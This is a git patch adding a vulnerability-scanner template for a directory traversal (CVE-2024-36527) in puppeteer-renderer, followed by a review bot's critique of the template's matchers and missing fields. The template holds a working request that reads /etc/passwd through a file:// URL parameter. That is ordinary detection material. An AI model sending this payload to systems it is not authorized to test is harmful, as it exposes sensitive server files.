From 18be56ef059d9c84e6de8f1b1fde393d01c48c20 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?C=C3=A9sar=20Calder=C3=B3n?=
Date: Thu, 1 Jan 1970 00:00:00 +0000
Subject: [PATCH] Added template for CVE-2024-36527
---
CVE-2024-36527.yaml | 26 ++++++++++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100644 CVE-2024-36527.yaml
diff --git a/CVE-2024-36527.yaml b/CVE-2024-36527.yaml
new file mode 100644
index 0000000000..e97c831e96
--- /dev/null
+++ b/CVE-2024-36527.yaml
@@ -0,0 +1,26 @@
+id: CVE-2024-36527
+
+info:
+ name: Puppeteer-renderer Directory Traversal
+ author: Stux
+ severity: medium
+ description: |
+ puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.
+ reference:
+ - https://github.com/zenato/puppeteer-renderer/issues/97
+ metadata:
+ max-request: 1
+ tags: cve,cve2024,puppeteer-renderer
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html?url=file:///etc/passwd"
+
+ matchers:
+ - type: word
+ words:
+ - "root:x"
+ - "/bin/bash"
+ part: body
+ condition: or
\ No newline at end of file
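Review bot: The single matcher at the end of the template fires on either `root:x` or `/bin/bash` anywhere in the body (`condition: or`) and checks no status code, so any response that merely mentions `/bin/bash` would be reported as vulnerable. Anchoring on the shape of a passwd record is more precise: change the matcher to `- type: regex` with `regex:` / `- "root:.*:0:0:"`. If the endpoint returns 200 on a successful render (not visible in this patch), pair it with a status matcher under `matchers-condition: and`. The `info` block also has no `classification` entry (`cve-id: CVE-2024-36527`) and no `remediation` line naming the release to upgrade to. The description only says 3.2.0 and earlier are affected, so the fixed version needs to be confirmed against the referenced issue.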